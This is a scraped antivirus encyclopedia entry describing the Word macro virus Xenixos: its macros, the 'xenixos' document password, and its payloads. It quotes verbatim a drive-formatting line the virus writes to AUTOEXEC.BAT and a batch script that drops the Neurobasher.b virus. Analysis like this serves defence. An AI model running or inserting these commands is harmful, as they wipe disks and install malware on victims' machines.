Kaspersky Threats

Class

Platform

Description

Technical Details

It is encrypted virus. It contains the macros:



Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden,

DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard.

In some cases it sets the password “xenixos” for infected documents,
displays the message:



Diese Option ist derzeit leider nicht verf�gbar.

Fehler

While printing the documents it appends:



Brought to you by the Nemesis Corporation, L1996

On 1st of may the virus writes the string to the AUTOEXEC.BAT file:



@echo j|format c: /u >nul

This virus also launches “Neurobasher.b” multipartite virus. To do that the
virus creates the C:DOSSCRIPT.SCR file, and writes hexadecimal dump
of that virus into there. Then the virus creates the C:DOSEXEC.BAT file,
and writes the strings into there:



@echo off

debug < script.scr>nul

rem debugger.com

echo @c:dosdebugger.exe>>c:autoexec.bat

del c:dosscript.scr

del c:dosexec.bat

Then the virus executes that file. As the result DEBUG.EXE creates the
DEBUGGER.EXE file, and C:AUTOEXEC.BAT has new string at its end:



@c:dosdebugger.exe

So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b”
virus.

Find out the statistics of the threats spreading in your region

Class	Virus
Platform	MSWord
Description	Technical Details It is encrypted virus. It contains the macros: Drop, Dummy, AutoExec, AutoOpen, Datei�ffnen, ExtrasMakro, DateiBeenden, DateiDrucken, DateiSpeichern, DateiSpeichernUnter, DateiDruckenStandard. In some cases it sets the password “xenixos” for infected documents, displays the message: Diese Option ist derzeit leider nicht verf�gbar. Fehler While printing the documents it appends: Brought to you by the Nemesis Corporation, L1996 On 1st of may the virus writes the string to the AUTOEXEC.BAT file: @echo j\|format c: /u >nul This virus also launches “Neurobasher.b” multipartite virus. To do that the virus creates the C:DOSSCRIPT.SCR file, and writes hexadecimal dump of that virus into there. Then the virus creates the C:DOSEXEC.BAT file, and writes the strings into there: @echo off debug < script.scr>nul rem debugger.com echo @c:dosdebugger.exe>>c:autoexec.bat del c:dosscript.scr del c:dosexec.bat Then the virus executes that file. As the result DEBUG.EXE creates the DEBUGGER.EXE file, and C:AUTOEXEC.BAT has new string at its end: @c:dosdebugger.exe So, the last command of AUTOEXEC.BAT launches dropper of “Neurobasher.b” virus.
	Find out the statistics of the threats spreading in your region

Virus.MSWord.Xenixos

Technical Details